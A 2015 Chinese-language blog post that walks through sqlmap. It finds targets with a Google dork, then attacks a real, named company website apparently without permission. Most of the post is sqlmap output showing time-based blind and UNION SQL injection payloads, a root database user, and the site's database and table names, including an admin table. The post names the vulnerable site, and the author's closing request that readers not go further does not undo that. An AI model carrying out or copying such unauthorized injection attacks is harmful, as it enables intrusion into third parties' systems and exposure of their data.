一 什么是sqlmap   

1 sqlmap is an open source penetration testing tool that automates the
2 process of detecting and exploiting SQL injection flaws and taking over of
3 database servers. It comes with a powerful detection engine, many niche
4 features for the ultimate penetration tester and a broad range of switches
5 lasting from database fingerprinting, over data fetching from the 
6 database,
7 to accessing the underlying file system and executing commands on the
8 operating system via out-of-band connections.

sqlmap 是一个开源的自动探测和发现sql注入漏洞以及拿下数据库服务器的工具.它有一个强大的探测引擎,许多有些的特性支持探测服务器以及拿下数据库服务器.

** 简言之 sqlmap 是个拿站工具.

二 安装.

  python 2.6 或2.7 ,mark 只是这两个主版本.sqlmap 安装可以用easy_install 或者用git clone 从仓库拿.

三 寻站

  google hack 啊, inurl:\".php\?id=

  就试下第二个吧.www.cowinbio.com/about/index.php?id=1 

  开干

 1  blind (heavy query)' injectable
 2 [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 3 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech
 4 ique tests as there is at least one other (potential) technique found
 5 [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
 6 [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col
 7 mn 1. sqlmap will try to find another column with better characteristics
 8 [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c
 9 lumns' injectable
10 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an
11 )? [y/N] n
12 sqlmap identified the following injection point(s) with a total of 2626 HTTP(s)
13 requests:
14 ---
15 Parameter: id (GET)
16     Type: AND/OR time-based blind

然后

 1          _
 2  ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
 3 |_ -| . | |     | .'| . |
 4 |___|_  |_|_|_|_|__,|  _|
 5       |_|           |_|   http://sqlmap.org
 6 
 7 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
 8  consent is illegal. It is the end user's responsibility to obey all applicabl
 9 local, state and federal laws. Developers assume no liability and are not resp
10 sible for any misuse or damage caused by this program
11 
12 [*] starting at 10:15:04
13 
14 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t
15  target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really
16 ant to force the back-end DBMS value? [y/N] y
17 [10:15:22] [INFO] testing connection to the target URL
18 [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi
19  could interfere with the results of the tests
20 [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/
21 S
22 sqlmap resumed the following injection point(s) from stored session:
23 ---
24 Parameter: id (GET)
25     Type: AND/OR time-based blind
26     Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
27     Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))
28 
29     Type: UNION query
30     Title: Generic UNION query (NULL) - 2 columns
31     Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
32 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
33 -- -
34 ---
35 [10:15:23] [INFO] testing MySQL
36 [10:15:23] [INFO] confirming MySQL
37 [10:15:23] [INFO] the back-end DBMS is MySQL
38 web application technology: PHP 5.6.9
39 back-end DBMS: MySQL < 5.0.0
40 [10:15:23] [INFO] fetching current user
41 current user:    'root@localhost'

再之后

         _
 ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program

[*] starting at 10:16:44

[10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic
 could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL
-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database:    'cw'
1 Database: cw
2 [3 tables]
3 +---------+
4 | admin   |
5 | news    |
6 | product |
7 +---------+

就到这里吧. 毕竟是写博客.本人并没有再进一步深入,希望各位看官也不要再进一步尝试了.

另外友情提醒这个站 ,你们不太安全.

郑重声明以上文章本人原创,转载请标明出处. 小三爷 此处谢过了~~.

 

posted on 2015-12-04 10:40  任城三爷  阅读(4055)  评论(0编辑  收藏  举报